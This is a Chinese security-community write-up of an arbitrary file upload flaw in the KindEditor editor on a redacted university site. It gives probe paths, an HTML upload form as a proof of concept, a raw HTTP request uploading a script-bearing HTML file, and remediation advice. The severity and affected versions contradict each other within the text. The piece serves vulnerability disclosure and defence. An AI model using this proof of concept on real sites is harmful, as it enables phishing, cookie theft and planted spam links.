点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
添加星标不迷路
由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦
介绍
漏洞名称:某大学创新展示活动平台 / 存在任意文件上传漏洞
漏洞等级:低危
漏洞 URL :
http://***.***.***.***/kindeditor/asp.net/upload_json.ashx?dir=file
一、 漏洞信息描述
漏洞存在于小于等于kindeditor4.1.5
编辑器里,你能上传.txt和 .html文件,支持php/asp/jsp/asp.net。/php/upload_json.php文件不会清理用户输入或者检查用户是否将任意文件上传到系统。通过构造一个恶意的 html文件来实现跳转,钓鱼等,恶意攻击者可实现。
二、漏洞版本
影响版本如下:
kindeditor版本<=4.1.11
三、漏洞复现
首先打开该URL之后返回的信息就很可疑:
http://***.***.***.***/kindeditor/asp.net/upload_json.ashx?dir=file
也就是
然后查看版本信息
版本是4.1.9可以进行尝试如下路径是否存在有必要验证文件 upload_json.*
kindeditor/asp/upload_json.asp?dir=file
kindeditor/asp.net/upload_json.ashx?dir=file
kindeditor/jsp/upload_json.jsp?dir=file
kindeditor/php/upload_json.php?dir=file
接着拼接出了刚刚那个可疑链接:
http://***.***.***.***/kindeditor/asp.net/upload_json.ashx?dir=file
基本确认漏洞存在
根据漏洞POC
POC:
<head>
<title>File Upload</title>
</head>
<body>
<form enctype="multipart/form-data" action="http://***.***.***.***/kindeditor/asp.net/upload_json.ashx?dir=file" method="post">
<p>Upload a new file:</p>
<input type="file" name="imgFile" size="50"><br>
<input type="submit" value="Upload">
</form>
</body>
</html>
准备好一个txt文件
在本地根据上述POC将其保存为 .html 然后在本地浏览器打开进行访问:
上传该123.txt文件
这里发现上传成功并回显出上传路径
同样 .html也可以成功
数据包如下
POST /kindeditor/asp.net/upload_json.ashx?dir=file HTTP/1.1
Host: ***.***.***.***
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------283422705626536477632563104216
Content-Length: 543
Connection: close
Cookie: ASPSESSIONIDQACQQBTT=XXXXXXXXXXXX
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
-----------------------------283422705626536477632563104216
Content-Disposition: form-data; name="imgFile"; filename="1.html"
Content-Type: application/octet-stream
<script>alert('1')</script>
-----------------------------283422705626536477632563104216--
路径如下:
http://***.***.***.***/UploadFile/file/20231107/20231107170528_1629.html
四、漏洞危害
钓鱼 打cookie 挂黑链,可以上传.html文件,这里就是攻击者最喜欢上传的文件(里面包含了各种暗页连接地址,如菠菜和其他色情站点链接地址)
五、修复建议
本次漏洞级别为高危,近期针对该漏洞的攻击活动正变得活跃,攻击对象一般是政府单位和公众企业,攻击者借此漏洞上传菠菜和色情链接,建议尽快做好安全加固配置。安全运营方面建议:直接删除upload_json.和 file_manager_json. 即可。安全开发生命周期(SDL)建议:KindEditor编辑器早在2017年就已被披露该漏洞详情,建议网站建设单位经常关注其系统使用的框架、依赖库、编辑器等组件的官方安全更新公告,采用最新版本的KindEditor。
直接删除upload_json.和file_manager_json.
升级kindeditor到最新版本原文始发于微信公众号(SecHub网络安全社区):EDU-SRC实战 | Kindeditor4.1.1编辑器文件上传
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论